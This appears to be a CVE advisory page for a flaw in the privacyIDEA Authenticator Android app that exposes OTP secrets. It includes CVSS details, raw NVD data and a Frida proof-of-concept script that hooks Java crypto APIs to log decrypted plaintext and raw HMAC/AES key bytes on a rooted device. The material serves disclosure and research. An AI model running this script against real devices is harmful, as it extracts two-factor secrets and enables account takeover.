Security Vulnerability Report
CVE-2025-61482 CVSS 7.2 HIGH

CVE-2025-61482

Published: 2025-10-27 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

Improper handling of OTP/TOTP/HOTP values in NetKnights GmbH privacyIDEA Authenticator v.4.3.0 on Android allows local attackers with root access to bypass two-factor authentication. By hooking into the app's crypto routines and intercepting decryption paths, an attacker can recover plaintext secrets, enabling generation of valid one-time passwords and bypassing authentication for enrolled accounts.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

NetKnights GmbH privacyIDEA Authenticator < 4.3.0 (Android)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-61482 PoC - Frida script to extract TOTP secrets from privacyIDEA Authenticator
// Requirements: rooted Android device, frida-server running, privacyIDEA Authenticator v4.3.0 installed
//
// NOTE(review): every hook below calls the original method and returns its result
// unchanged; the script only logs to the Frida console. The impact is confidentiality
// of material that transits these Java crypto APIs in plaintext while the process is
// instrumented on a rooted device — nothing here alters the app's control flow.
Java.perform(function() {
  // Hook Cipher.doFinal(byte[]) and log the returned plaintext as hex.
  var Cipher = Java.use('javax.crypto.Cipher');
  Cipher.doFinal.overload('[B').implementation = function(encryptedData) {
    var result = this.doFinal(encryptedData);
    console.log('[+] Captured decrypted data: ' + bytesToHex(result));
    // Length heuristic only: any plaintext of 20 or more bytes is flagged, so this
    // also fires on unrelated decryptions; it does not identify a seed by itself.
    if (result.length >= 20) {
      console.log('[!] Possible TOTP seed extracted');
    }
    return result;
  };
  // Hook KeyStore.getEntry. Only the alias is logged; the entry object is passed
  // back untouched and no key material is read from it here.
  // NOTE(review): this is consistent with keystore-held keys not being readable by
  // the hook — the script recovers plaintext at the doFinal boundary instead. Confirm.
  var KeyStore = Java.use('java.security.KeyStore');
  KeyStore.getEntry.implementation = function(alias, param) {
    var entry = this.getEntry(alias, param);
    console.log('[+] KeyStore entry accessed for alias: ' + alias);
    return entry;
  };
  // Hook SecretKeySpec(byte[], String). The raw key bytes are logged only when the
  // algorithm name contains 'AES' or 'Hmac'; other algorithms log the name alone.
  var SecretKeySpec = Java.use('javax.crypto.spec.SecretKeySpec');
  SecretKeySpec.$init.overload('[B', 'java.lang.String').implementation = function(key, algorithm) {
    console.log('[+] SecretKeySpec created with algorithm: ' + algorithm);
    if (algorithm.indexOf('AES') !== -1 || algorithm.indexOf('Hmac') !== -1) {
      console.log('[!] Potential OTP key material: ' + bytesToHex(key));
    }
    return this.$init(key, algorithm);
  };
});

// Render a byte array as lowercase hex, two characters per byte.
// `b & 0xFF` maps signed Java byte values (-128..127) onto 0..255 before formatting;
// the '00' prefix plus slice(-2) left-pads single-digit values.
function bytesToHex(bytes) {
  return Array.from(bytes).map(b => ('00' + (b & 0xFF).toString(16)).slice(-2)).join('');
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61482", "sourceIdentifier": "[email protected]", "published": "2025-10-27T15:15:38.917", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper handling of OTP/TOTP/HOTP values in NetKnights GmbH privacyIDEA Authenticator v.4.3.0 on Android allows local attackers with root access to bypass two factor authentication. By hooking into app crypto routines and intercepting decryption paths, attacker can recover plaintext secrets, enabling generation of valid one-time passwords, and bypassing authentication for enrolled accounts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-922"}]}], "references": [{"url": "https://github.com/ReversecLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js", "source": "[email protected]"}, {"url": "https://svarthatt.se/cve/cve-2025-61482-pulling-otp-secrets-from-privacyidea-authenticator/", "source": "[email protected]"}]}}